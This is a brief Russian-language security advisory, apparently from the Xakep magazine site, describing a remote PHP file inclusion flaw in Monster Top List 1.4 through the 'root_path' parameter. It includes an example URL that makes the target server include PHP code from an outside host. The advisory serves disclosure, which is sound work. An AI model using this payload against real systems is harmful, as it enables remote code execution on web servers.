PHP-инклюдинг в Monster Top List

Рекомендуем почитать:

Xakep #299. Sysmon

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Monster Top List 1.4, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "root_path" в сценарии "sources/functions.php". Удаленный
пользователь может с помощью специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/

PHP-инклюдинг в Monster Top List

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

EIGRP Scam. Отравляем таблицу маршрутизации на Python

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Стал доступен API для Stable Diffusion 3

Группа Core Werewolf попыталась атаковать российскую военную базу

Открыт новый набор на практические курсы по информационной безопасности ИНСЕКА

Ботнеты активно пользуются уязвимостью в роутерах TP-Link

Опубликован эксплоит для свежей уязвимости в PAN-OS Palo Alto Networks